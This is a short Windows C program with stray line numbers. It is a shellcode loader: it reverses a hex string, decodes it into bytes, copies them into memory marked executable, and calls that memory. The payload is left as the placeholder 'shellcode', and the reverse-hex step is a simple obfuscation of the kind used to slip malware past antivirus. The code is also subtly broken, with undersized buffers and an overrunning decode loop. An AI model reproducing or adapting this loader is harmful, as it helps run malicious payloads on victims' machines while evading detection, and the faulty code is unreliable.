1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
| #include <Windows.h>
#include <stdio.h>
#pragma warning(disable:4996);
int main() {
char *str = "shellcode";
unsigned int char_in_hex;
unsigned int iterations = strlen(str);
unsigned int memory_allocation = strlen(str) / 2;
char* temp = (char*)VirtualAlloc(0, memory_allocation, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
int p = 0;
for (int i = strlen(str) - 1; i >= 0; i--)
{
temp[p++] = str[i];
}
char* shellcode = (char*)temp;
for (int i = 0; i < iterations - 1; i++) {
sscanf(shellcode + 2 * i, "%2X", &char_in_hex);
shellcode[i] = (char)char_in_hex;
}
void* exec = VirtualAlloc(0, memory_allocation, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(exec, shellcode, memory_allocation);
(*(void(*WINAPI)()) exec)();
return 0;
}
|